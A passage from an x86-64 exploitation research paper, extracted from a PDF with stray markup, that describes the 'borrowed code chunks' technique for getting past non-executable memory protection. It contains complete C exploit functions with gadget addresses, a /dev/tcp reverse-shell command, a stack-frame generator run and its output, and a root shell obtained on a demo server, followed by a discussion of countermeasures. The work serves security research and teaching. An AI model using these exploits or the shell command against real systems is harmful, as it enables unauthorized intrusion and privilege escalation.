23 char *cmd = "sh < /dev/tcp/127.0.0.1/3128 > /dev/tcp/127.0.0.1/8080;";<br />
24 server_stack.ulimit_143 = 0x00002aaaaac743df;<br />
25 server_stack.rbx = 0x00002aaaaabfb290;<br />
26 server_stack.ulimit_133 = 0x00002aaaaac743d5;<br />
27 memset(server_stack.rsp_off, ’A’, sizeof(server_stack.rsp_off));<br />
28 server_stack.setuid_52 = 0x00002aaaaac50bf4;<br />
29 memset(server_stack.system, 0, sizeof(server_stack.system)-1);<br />
30 assert(strlen(cmd) < sizeof(server_stack.system));<br />
31 strcpy(server_stack.system, cmd);<br />
32 if ((sock = tcp_connect(host, 1234)) < 0)<br />
33 die("tcp_connect");<br />
3 The GOT entry we want to modify.<br />
NO-NX
6 SINGLE WRITE EXPLOITS 11<br />
34 read(sock, trigger, sizeof(trigger));<br />
35 assert(tlen > sizeof(server_stack));<br />
36 memcpy(trigger, &server_stack, sizeof(server_stack));<br />
37 writen(sock, trigger, tlen);<br />
38 usleep(1000);<br />
39 read(sock, trigger, 3);<br />
40 // 0000000000400868 :<br />
41 // 400868: ff 25 8a 09 10 00 jmpq *1051018(%rip) # 5011f8 <br />
42 // 40086e: 68 04 00 00 00 pushq $0x4<br />
43 // 400873: e9 a0 ff ff ff jmpq 400818 <br />
44 val1 = 0x5011f8;<br />
45 val2 = 0x00002aaaaac1a90a; // stack lifting from funlockfile+298<br />
46 writen(sock, &val1, sizeof(val1));<br />
47 writen(sock, &val2, sizeof(val2));<br />
48 sleep(10);<br />
49 read(sock, trigger, 3);<br />
50 close(sock);<br />
51 }<br />
The <strong>code</strong> which gets executed is (retq omitted):<br />
add<br />
pop<br />
pop<br />
pop<br />
mov<br />
add<br />
pop<br />
mov<br />
callq<br />
$0x8,%rsp<br />
%rbx<br />
%rbp<br />
%rbx<br />
%rbx,%rax<br />
$0xe0,%rsp<br />
%rbx<br />
%rsp,%rdi<br />
*%eax<br />
Thats very similar to <strong>the</strong> first exploiting function except <strong>the</strong> stack has to be<br />
lifted to <strong>the</strong> appropriate location. The first three instructions are responsible<br />
for this. The exploit works also without brute forcing <strong>and</strong> it works<br />
very well:<br />
linux: $ ./client2<br />
Connected!<br />
Linux linux 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 <strong>x86</strong>_<strong>64</strong> <strong>x86</strong>_<strong>64</strong> <strong>x86</strong>_<strong>64</strong> GNU/Linux<br />
uid=0(root) gid=0(root) groups=0(root)<br />
11:04:39 up 2:23, 5 users, load average: 0.36, 0.18, 0.06<br />
USER TTY LOGIN@ IDLE JCPU PCPU WHAT<br />
root tty1 08:42 3.00s 0.11s 0.00s ./server2<br />
user tty2 08:42 0.00s 0.31s 0.01s login -- user<br />
user tty3 08:43 42:56 0.11s 0.11s -bash<br />
user tty4 09:01 6:11 0.29s 0.29s -bash<br />
user tty5 10:04 51:08 0.07s 0.07s -bash<br />
NO-NX
7 AUTOMATED EXPLOITATION 12<br />
Figure 1: Six important <strong>code</strong> <strong>chunks</strong> <strong>and</strong> its op<strong>code</strong>s.<br />
Code <strong>chunks</strong> Op<strong>code</strong>s<br />
pop %rdi; retq 0x5f 0xc3<br />
pop %rsi; retq 0x5e 0xc<br />
pop %rdx; retq 0x5a 0xc3<br />
pop %rcx; retq 0x59 0xc3<br />
pop %r8; retq 0x41 0x58 0xc3<br />
pop %r9; retq 0x41 0x59 0xc3<br />
Figure 2: Stack layout of a 3-argument function call. Higher addresses at <strong>the</strong> top.<br />
...<br />
&function<br />
argument3<br />
&pop %rdx; retq<br />
argument2<br />
&pop %rsi; retq<br />
argument1<br />
&pop %rdi; retq<br />
...<br />
7 Automated exploitation<br />
During <strong>the</strong> last sections it was obvious that <strong>the</strong> described technique is very<br />
powerful <strong>and</strong> it is easily possible to bypass <strong>the</strong> <strong>buffer</strong> <strong>overflow</strong> protection<br />
based on <strong>the</strong> R/X splitting. Never<strong>the</strong>less it is a bit of a hassle to walk<br />
through <strong>the</strong> target <strong>code</strong> <strong>and</strong> search for proper instructions to build up a<br />
somewhat useful <strong>code</strong> chain. It would be much easier if something like<br />
a special shell<strong>code</strong> compiler would search <strong>the</strong> address space <strong>and</strong> build a<br />
fake stack which has all <strong>the</strong> <strong>code</strong> <strong>chunks</strong> <strong>and</strong> symbols already resolved<br />
<strong>and</strong> which can be imported by <strong>the</strong> exploit.<br />
The ABI says that <strong>the</strong> first six integer arguments are passed within <strong>the</strong> registers<br />
%rdi,%rsi,%rdx,%rcx,%r8,%r9 in that order. So we have<br />
to search for <strong>the</strong>se instructions which do not need to be placed on instruction<br />
boundary but can be located somewhere within an executable page.<br />
Lets have a look at <strong>the</strong> op<strong>code</strong>s of <strong>the</strong> <strong>code</strong> <strong>chunks</strong> we need at figure 1.<br />
As can be seen, <strong>the</strong> four most important <strong>chunks</strong> have only a length<br />
of two byte. The library calls attackers commonly need do not have more<br />
than three arguments in most cases. Chances to find <strong>the</strong>se two-byte <strong>chunks</strong><br />
within libc or o<strong>the</strong>r loaded libraries of <strong>the</strong> target program are very high.<br />
NO-NX
7 AUTOMATED EXPLOITATION 13<br />
A stack frame for a library call with three arguments assembled with <strong>borrowed</strong><br />
<strong>code</strong> <strong>chunks</strong> is shown in figure 2. & is <strong>the</strong> address operator as<br />
known from <strong>the</strong> C programming language. Keep in mind: arguments to<br />
function() are passed within <strong>the</strong> registers. The arguments on <strong>the</strong> stack are<br />
popped into <strong>the</strong> registers by placing <strong>the</strong> addresses of <strong>the</strong> appropriate <strong>code</strong><br />
<strong>chunks</strong> on <strong>the</strong> stack. Such one block will execute function() <strong>and</strong> can be<br />
chained with o<strong>the</strong>r blocks to execute more than one function. A small tool<br />
which builds such stack frames from a special input language is available<br />
at [10].<br />
linux: $ ps aux|grep server<br />
root 7020 0.0 0.0 2404 376 tty3 S+ 12:14 0:00 ./server<br />
root 7188 0.0 0.1 2684 516 tty2 R+ 12:33 0:00 grep server<br />
linux: $ cat calls<br />
0<br />
setuid<br />
fork<br />
1<br />
2<br />
3<br />
setresuid<br />
42<br />
close<br />
1<br />
exit<br />
linux: $ ./find -p 7020 < calls<br />
7190: [2aaaaaaab000-2aaaaaac1000] 0x2aaaaaaab000-0x2aaaaaac1000 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rsi; retq @0x2aaaaaaabdfd /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rdi; retq @0x2aaaaaaac0a9 /lib<strong>64</strong>/ld-2.3.4.so<br />
7190: [2aaaaabc2000-2aaaaabc4000] 0x2aaaaabc2000-0x2aaaaabc4000 /lib<strong>64</strong>/libdl.so.2<br />
7190: [2aaaaacc5000-2aaaaade2000] 0x2aaaaacc5000-0x2aaaaade2000 /lib<strong>64</strong>/tls/libc.so.6<br />
pop %r8; retq @0x2aaaaacf82c3 /lib<strong>64</strong>/tls/libc.so.6<br />
pop %rdx; retq @0x2aaaaad890f5 /lib<strong>64</strong>/tls/libc.so.6<br />
Target process 7020, offset 0<br />
Target process 7020, offset 0<br />
libc_offset=10608<strong>64</strong><br />
Target process 7020, offset 10608<strong>64</strong><br />
Target process 7020, offset 10608<strong>64</strong><br />
pop %rdi; retq 0x2aaaaaaac0a9 0 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rsi; retq 0x2aaaaaaabdfd 0 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rdx; retq 0x2aaaaad890f5 10608<strong>64</strong> /lib<strong>64</strong>/tls/libc.so.6<br />
pop %rcx; retq (nil) 0 (null)<br />
pop %r8; retq 0x2aaaaacf82c3 10608<strong>64</strong> /lib<strong>64</strong>/tls/libc.so.6<br />
pop %r9; retq (nil) 0 (null)<br />
u_int<strong>64</strong>_t <strong>chunks</strong>[] = {<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x0,<br />
0x2aaaaac50bc0, // setuid<br />
};<br />
0x2aaaaac4fdd0, // fork<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x1,<br />
0x2aaaaaaabdfd, // pop %rsi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x2,<br />
0x2aaaaac860f5, // pop %rdx; retq,/lib<strong>64</strong>/tls/libc.so.6<br />
0x3,<br />
0x2aaaaac50e60, // setresuid<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x2a,<br />
0x2aaaaac6ed00, // close<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x1,<br />
0x2aaaaabf2610, // exit<br />
NO-NX<br />
The calls file is written in that special language <strong>and</strong> tells <strong>the</strong> chunk com-
7 AUTOMATED EXPLOITATION 14<br />
piler to build a stack frame which, if placed appropriately on <strong>the</strong> vulnerable<br />
server program, calls <strong>the</strong> function sequence of<br />
setuid(0);<br />
fork();<br />
setresuid(1,2,3);<br />
close(42);<br />
exit(1);<br />
just to demonstrate that things work. These are actually calls to libc functions.<br />
These are not direct calls to system-calls via <strong>the</strong> SYSCALL instruction.<br />
The order of arguments is PASCAL-style within <strong>the</strong> chunk-compiler<br />
language, e.g. <strong>the</strong> first argument comes first. The important output is <strong>the</strong><br />
u int<strong>64</strong> t <strong>chunks</strong>[] array which can be used right away to exploit<br />
<strong>the</strong> process which it was given via <strong>the</strong> -p switch. This was <strong>the</strong> PID of<br />
<strong>the</strong> server process in this example. The array can be cut&pasted to <strong>the</strong><br />
exploit() function:<br />
1 void exploit(const char *host)<br />
2 {<br />
3 int sock = -1;<br />
4 char trigger[4096];<br />
5 size_t tlen = sizeof(trigger);<br />
6 struct t_stack {<br />
7 char buf[1024];<br />
8 u_int<strong>64</strong>_t rbx;<br />
9 u_int<strong>64</strong>_t <strong>code</strong>[17];<br />
10 } __attribute__ ((packed)) server_stack;<br />
11 u_int<strong>64</strong>_t <strong>chunks</strong>[] = {<br />
12 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
13 0x0,<br />
14 0x2aaaaac50bc0, // setuid<br />
15 0x2aaaaac4fdd0, // fork<br />
16 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
17 0x1,<br />
18 0x2aaaaaaabdfd, // pop %rsi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
19 0x2,<br />
20 0x2aaaaac860f5, // pop %rdx; retq,/lib<strong>64</strong>/tls/libc.so.6<br />
21 0x3,<br />
22 0x2aaaaac50e60, // setresuid<br />
23 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
24 0x2a,<br />
25 0x2aaaaac6ed00, // close<br />
26 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
27 0x1,<br />
28 0x2aaaaabf2610, // exit<br />
29 };<br />
30 memset(server_stack.buf, ’X’, sizeof(server_stack.buf));<br />
31 server_stack.rbx = 0x00002aaaaabfb290;<br />
32 memcpy(server_stack.<strong>code</strong>, <strong>chunks</strong>, sizeof(server_stack.<strong>code</strong>));<br />
33 if ((sock = tcp_connect(host, 1234)) < 0)<br />
34 die("tcp_connect");<br />
35 read(sock, trigger, sizeof(trigger));<br />
NO-NX<br />
36 assert(tlen > sizeof(server_stack));<br />
37 memcpy(trigger, &server_stack, sizeof(server_stack));<br />
38 writen(sock, trigger, tlen);<br />
39 usleep(1000);<br />
40 read(sock, trigger, 1);<br />
41 close(sock);<br />
42 }
7 AUTOMATED EXPLOITATION 15<br />
When running <strong>the</strong> exploit client-automatic, an attached strace shows<br />
that <strong>the</strong> right functions are executed in <strong>the</strong> right order. This time <strong>the</strong><br />
system-calls are actually shown in <strong>the</strong> trace-log but thats OK since <strong>the</strong><br />
triggered libc calls will eventually call <strong>the</strong> corresponding system calls.<br />
linux:˜ # strace -i -f -p 7020<br />
Process 7020 attached - interrupt to quit<br />
[ 2aaaaac7bd72] accept(3, 0, NULL) = 4<br />
[ 2aaaaac4fe4b] clone(Process 7227 attached<br />
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaade8b90) = 7227<br />
[pid 7020] [ 2aaaaac6ed12] close(4) = 0<br />
[pid 7020] [ 2aaaaac7bd72] accept(3, <br />
[pid 7227] [ 2aaaaac6ee22] write(4, "OF Server 1.0\n", 14) = 14<br />
[pid 7227] [ 2aaaaac6ed92] read(4, "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"..., 4096) = 4096<br />
[pid 7227] [ 2aaaaac6ee22] write(4, "OK\n", 3) = 3<br />
[pid 7227] [ 2aaaaac50bd9] setuid(0) = 0<br />
[pid 7227] [ 2aaaaac4fe4b] clone(Process 7228 attached<br />
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaade8b90) = 7228<br />
[pid 7227] [ 2aaaaac50e7d] setresuid(1, 2, 3) = 0<br />
[pid 7227] [ 2aaaaac6ed12] close(42) = -1 EBADF (Bad file descriptor)<br />
[pid 7227] [ 2aaaaac78579] munmap(0x2aaaaaac2000, 4096) = 0<br />
[pid 7227] [ 2aaaaac500fa] exit_group(1) = ?<br />
Process 7227 detached<br />
[pid 7020] [ 2aaaaac7bd72] 0, NULL) = ? ERESTARTSYS (To be restarted)<br />
[pid 7020] [ 2aaaaac7bd72] --- SIGCHLD (Child exited) @ 0 (0) ---<br />
[pid 7020] [ 2aaaaac4f6d4] wait4(-1, NULL, WNOHANG, NULL) = 7227<br />
[pid 7020] [ 2aaaaac4f6d4] wait4(-1, NULL, WNOHANG, NULL) = -1 ECHILD (No child processes)<br />
[pid 7020] [ 2aaaaabeff09] rt_sigreturn(0xffffffffffffffff) = 43<br />
[pid 7020] [ 2aaaaac7bd72] accept(3, <br />
[pid 7228] [ 2aaaaac50e7d] setresuid(1, 2, 3) = 0<br />
[pid 7228] [ 2aaaaac6ed12] close(42) = -1 EBADF (Bad file descriptor)<br />
[pid 7228] [ 2aaaaac78579] munmap(0x2aaaaaac2000, 4096) = 0<br />
[pid 7228] [ 2aaaaac500fa] exit_group(1) = ?<br />
Process 7228 detached<br />
Everything worked as expected, even <strong>the</strong> fork(2) which can be seen by<br />
<strong>the</strong> <strong>the</strong> spawned process. I don’t want to hide <strong>the</strong> fact that all <strong>the</strong> <strong>exploits</strong><br />
send 0-bytes across <strong>the</strong> wire. If <strong>the</strong> target process introduces strcpy(3)<br />
calls this might be problematic since 0 is <strong>the</strong> string terminator. However,<br />
deeper research might allow to remove <strong>the</strong> 0-bytes <strong>and</strong> most <strong>overflow</strong>s<br />
today don’t happen anymore due to stupid strcpy(3) calls. Indeed even<br />
most of <strong>the</strong>m accept 0 bytes since most <strong>overflow</strong>s happen due to integer<br />
miscalculation of length fields today.<br />
Eventually we want to generate a shell<strong>code</strong> which executes a shell. We<br />
still use <strong>the</strong> same vulnerable server program. But this time we generate a<br />
stack which also calls <strong>the</strong> system(3) function instead of <strong>the</strong> dummy calls<br />
from <strong>the</strong> last example. To show that its still a calling sequence <strong>and</strong> not just<br />
a single function call, <strong>the</strong> UID is set to <strong>the</strong> wwwrun user via <strong>the</strong> setuid(3)<br />
function call. The problem with a call to system(3) is that it expects a<br />
pointer argument. The <strong>code</strong> generator however is not clever enough 4 to<br />
find out where <strong>the</strong> comm<strong>and</strong> is located. Thats why we need to brute force<br />
<strong>the</strong> argument for system(3) within <strong>the</strong> exploit. As with common old-school<br />
<strong>exploits</strong>, we can use NOP’s to increase <strong>the</strong> steps during brute force. We<br />
know that <strong>the</strong> comm<strong>and</strong> string is located on <strong>the</strong> stack. The space character<br />
’ ’ serves very well as a NOP since our NOP will be a NOP to <strong>the</strong> system(3)<br />
argument, e.g. we can pass "/bin/sh" or " /bin/sh" to system(3).<br />
NO-NX<br />
4 Not yet clever enough. It is however possible to use ptrace(2) to look for <strong>the</strong> address of certain<br />
strings in <strong>the</strong> target process address space.
7 AUTOMATED EXPLOITATION 16<br />
linux:$ ps aux|grep server<br />
root 7207 0.0 0.0 2404 368 tty1 S+ 15:09 0:00 ./server<br />
user@linux:> cat calls-shell<br />
30<br />
setuid<br />
/bin/sh<br />
system<br />
linux:$ ./find -p 7207 < calls-shell<br />
7276: [2aaaaaaab000-2aaaaaac1000] 0x2aaaaaaab000-0x2aaaaaac1000 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rsi; retq @0x2aaaaaaabdfd /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rdi; retq @0x2aaaaaaac0a9 /lib<strong>64</strong>/ld-2.3.4.so<br />
7276: [2aaaaabc2000-2aaaaabc4000] 0x2aaaaabc2000-0x2aaaaabc4000 /lib<strong>64</strong>/libdl.so.2<br />
7276: [2aaaaacc5000-2aaaaade2000] 0x2aaaaacc5000-0x2aaaaade2000 /lib<strong>64</strong>/tls/libc.so.6<br />
pop %r8; retq @0x2aaaaacf82c3 /lib<strong>64</strong>/tls/libc.so.6<br />
pop %rdx; retq @0x2aaaaad890f5 /lib<strong>64</strong>/tls/libc.so.6<br />
Target process 7207, offset 0<br />
Target process 7207, offset 0<br />
libc_offset=10608<strong>64</strong><br />
Target process 7207, offset 10608<strong>64</strong><br />
Target process 7207, offset 10608<strong>64</strong><br />
pop %rdi; retq 0x2aaaaaaac0a9 0 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rsi; retq 0x2aaaaaaabdfd 0 /lib<strong>64</strong>/ld-2.3.4.so<br />
pop %rdx; retq 0x2aaaaad890f5 10608<strong>64</strong> /lib<strong>64</strong>/tls/libc.so.6<br />
pop %rcx; retq (nil) 0 (null)<br />
pop %r8; retq 0x2aaaaacf82c3 10608<strong>64</strong> /lib<strong>64</strong>/tls/libc.so.6<br />
pop %r9; retq (nil) 0 (null)<br />
u_int<strong>64</strong>_t <strong>chunks</strong>[] = {<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
0x1e,<br />
0x2aaaaac50bc0, // setuid<br />
};<br />
linux:$<br />
0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
,<br />
0x2aaaaabfb290, // system<br />
The fourth entry of <strong>the</strong> <strong>chunks</strong>[] array has to hold <strong>the</strong> address of <strong>the</strong><br />
comm<strong>and</strong> <strong>and</strong> has to be brute forced. The exploit function looks like this:<br />
1 void exploit(const char *host)<br />
2 {<br />
3 int sock = -1;<br />
4 char trigger[4096];<br />
5 size_t tlen = sizeof(trigger);<br />
6 struct t_stack {<br />
7 char buf[1024];<br />
8 u_int<strong>64</strong>_t rbx;<br />
9 u_int<strong>64</strong>_t <strong>code</strong>[6];<br />
10 char cmd[512];<br />
11 } __attribute__ ((packed)) server_stack;<br />
12 u_int<strong>64</strong>_t <strong>chunks</strong>[] = {<br />
13 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
14 0x1e,<br />
15 0x2aaaaac50bc0, // setuid<br />
16 0x2aaaaaaac0a9, // pop %rdi; retq,/lib<strong>64</strong>/ld-2.3.4.so<br />
17 0, // to be brute forced<br />
18 0x2aaaaabfb290, // system<br />
19 };<br />
20 u_int<strong>64</strong>_t stack;<br />
21 char *cmd = " " // ˜80 NOPs<br />
22 "sh < /dev/tcp/127.0.0.1/3128 > /dev/tcp/127.0.0.1/8080;";<br />
23 memset(server_stack.buf, ’X’, sizeof(server_stack.buf));<br />
24 server_stack.rbx = 0x00002aaaaabfb290;<br />
25 strcpy(server_stack.cmd, cmd);<br />
26 for (stack = 0x7ffffffeb000; stack < 0x800000000000; stack += 70) {<br />
27 printf("0x%08lx\r", stack);<br />
28 <strong>chunks</strong>[4] = stack;<br />
29 memcpy(server_stack.<strong>code</strong>, <strong>chunks</strong>, sizeof(server_stack.<strong>code</strong>));<br />
30 if ((sock = tcp_connect(host, 1234)) < 0)<br />
31 die("tcp_connect");<br />
NO-NX
8 RELATED WORK 17<br />
32 read(sock, trigger, sizeof(trigger));<br />
33 assert(tlen > sizeof(server_stack));<br />
34 memcpy(trigger, &server_stack, sizeof(server_stack));<br />
35 writen(sock, trigger, tlen);<br />
36 usleep(1000);<br />
37 read(sock, trigger, 1);<br />
38 close(sock);<br />
39 }<br />
40 }<br />
Due to <strong>the</strong> brute forcing of <strong>the</strong> system(3) argument this time, <strong>the</strong> server<br />
executes a lot of junk until <strong>the</strong> right address is hit:<br />
&sock = 0x7ffffffff0fc system=0x400938 mmap=0x400928<br />
sh: : comm<strong>and</strong> not found<br />
sh: h: comm<strong>and</strong> not found<br />
sh: : comm<strong>and</strong> not found<br />
sh: -c: line 0: syntax error near unexpected token ‘newline’<br />
sh: -c: line 0: ‘!’<br />
sh: : comm<strong>and</strong> not found<br />
sh: *: comm<strong>and</strong> not found<br />
sh: *: comm<strong>and</strong> not found<br />
sh: : comm<strong>and</strong> not found<br />
sh:h: *: comm<strong>and</strong> not found<br />
sh: : comm<strong>and</strong> not found<br />
sh: : comm<strong>and</strong> not found<br />
sh: : comm<strong>and</strong> not found<br />
sh: X*: comm<strong>and</strong> not found<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX: comm<strong>and</strong> not<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX: comm<strong>and</strong> not found<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX: comm<strong>and</strong> not found<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXA*: comm<strong>and</strong> not found<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXA*: comm<strong>and</strong> not found<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX: comm<strong>and</strong> not<br />
sh: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX: comm<strong>and</strong> not found<br />
sh: *: comm<strong>and</strong> not found<br />
However it eventually finds <strong>the</strong> right address:<br />
linux: $ cc -Wall -O2 client-automatic-shell.c<br />
linux: $ ./a.out<br />
0x7ffffffff1d6<br />
Connected!<br />
Linux linux 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 <strong>x86</strong>_<strong>64</strong> <strong>x86</strong>_<strong>64</strong> <strong>x86</strong>_<strong>64</strong> GNU/Linux<br />
uid=30(wwwrun) gid=0(root) groups=0(root)<br />
15:38:51 up 2:01, 3 users, load average: 0.74, 0.32, 0.14<br />
USER TTY LOGIN@ IDLE JCPU PCPU WHAT<br />
root tty1 13:38 16.00s 5.84s 5.57s ./server<br />
user tty2 13:38 12.00s 0.33s 0.00s ./a.out<br />
root tty3 13:41 4:07 0.10s 0.10s -bash<br />
8 Related work<br />
The whole technique is probably not entirely new. Some similar work<br />
but without automatic stack-frame generation has been done in [9] for <strong>the</strong><br />
SPARC CPU which I was pointed to after a preview of this paper. I also<br />
want to point you again to <strong>the</strong> return-into-libc technique at [4], [5] <strong>and</strong> [6]<br />
because this is <strong>the</strong> sister of <strong>the</strong> technique described in this paper.<br />
NO-NX
9 COUNTERMEASURES 18<br />
9 Countermeasures<br />
I believe that as long as <strong>buffer</strong> <strong>overflow</strong>s happen <strong>the</strong>re is a way to (mis-<br />
)control <strong>the</strong> application even if page protections or o<strong>the</strong>r mechanisms forbid<br />
for directly executing shell<strong>code</strong>. The reason is that due to <strong>the</strong> complex<br />
nature of todays applications a lot of <strong>the</strong> shell<strong>code</strong> is already within <strong>the</strong><br />
application itself. SSH servers for example already carry <strong>code</strong> to execute<br />
a shell because its <strong>the</strong> programs aim to allow remote control. Never<strong>the</strong>less<br />
I will discuss two mechanisms which might make things harder to exploit.<br />
• Address Space Layout R<strong>and</strong>omization - ASLR<br />
The <strong>code</strong> <strong>chunks</strong> borrow technique is an exact science. As you see<br />
from <strong>the</strong> exploit no offsets are guessed. The correct values have to<br />
be put into <strong>the</strong> correct registers. By mapping <strong>the</strong> libraries of <strong>the</strong> application<br />
to more or less r<strong>and</strong>om locations it is not possible anymore<br />
to determine where certain <strong>code</strong> <strong>chunks</strong> are placed in memory. Even<br />
though <strong>the</strong>re are <strong>the</strong>oretically <strong>64</strong>-bit addresses, applications are only<br />
required to h<strong>and</strong>le 48-bit addresses. This shrinks <strong>the</strong> address space<br />
dramatically as well as <strong>the</strong> number of bits which could be r<strong>and</strong>omized.<br />
Additionally, <strong>the</strong> address of a appropriate <strong>code</strong> chunk has only<br />
to be guessed once, <strong>the</strong> o<strong>the</strong>r <strong>chunks</strong> are relative to <strong>the</strong> first one. So<br />
guessing of addresses probably still remains possible.<br />
• Register flushing<br />
At every function outro a xor %rdi, %rdi or similar instruction<br />
could be placed if <strong>the</strong> ELF<strong>64</strong> ABI allows so. However, as shown,<br />
<strong>the</strong> pop instructions do not need to be on instruction boundary which<br />
means that even if you flush registers at <strong>the</strong> function outro, <strong>the</strong>re are<br />
still plenty of usable pop instructions left. Remember that a pop<br />
%rdi; retq sequence takes just two bytes.<br />
10 Conclusion<br />
Even though I only tested <strong>the</strong> Linux <strong>x86</strong>-<strong>64</strong> platform, I see no restrictions<br />
why this should not work on o<strong>the</strong>r platforms as well e.g. <strong>x86</strong>-<strong>64</strong>BSD,<br />
IA32 or SPARC. Even o<strong>the</strong>r CPUs with <strong>the</strong> same page protection mechanisms<br />
or <strong>the</strong> PaX patch should be escapable this way. Successful exploitation<br />
will in future much more depend on <strong>the</strong> application, its structure,<br />
<strong>the</strong> compiler it was compiled with <strong>and</strong> <strong>the</strong> libraries it was linked against.<br />
Imagine if we could not find a instruction sequence that fills %rdi it would<br />
be much harder if not impossible.<br />
However it also shows that <strong>overflow</strong>s are not dead, even on such hardened<br />
platforms.<br />
NO-NX
11 CREDITS 19<br />
11 Credits<br />
Thanks to Marcus Meissner, Andreas Jaeger, FX, Solar Designer <strong>and</strong> Halvar<br />
Flake for reviewing this paper.<br />
NO-NX
REFERENCES 20<br />
References<br />
[1] AMD:<br />
http://developer.amd.com/documentation.aspx<br />
[2] <strong>x86</strong>-<strong>64</strong> ABI:<br />
http://www.<strong>x86</strong>-<strong>64</strong>.org/documentation/abi.pdf<br />
[3] Description of <strong>buffer</strong> <strong>overflow</strong>s:<br />
http://www.cs.rpi.edu/˜hollingd/netprog/notes/<strong>overflow</strong>/<strong>overflow</strong>.<br />
[4] Advanced return into libc:<br />
http://www.phrack.org/phrack/58/p58-0x04<br />
[5] Return into libc:<br />
http://www.ussg.iu.edu/hypermail/linux/kernel/9802.0/0199.html<br />
[6] Return into libc:<br />
http://marc.<strong>the</strong>aimsgroup.com/?l=bugtraq&m=87602746719512<br />
[7] PaX:<br />
http:///pax.grsecurity.net<br />
[8] malloc <strong>overflow</strong>s:<br />
http://www.phrack.org/phrack/57/p57-0x09<br />
[9] John McDonald<br />
http://thc.org/root/docs/exploit_writing/sol-ne-stack.html<br />
[10] Borrowed <strong>code</strong>-<strong>chunks</strong> exploitation technique:<br />
http://www.suse.de/˜krahmer/bccet.tgz<br />
NO-NX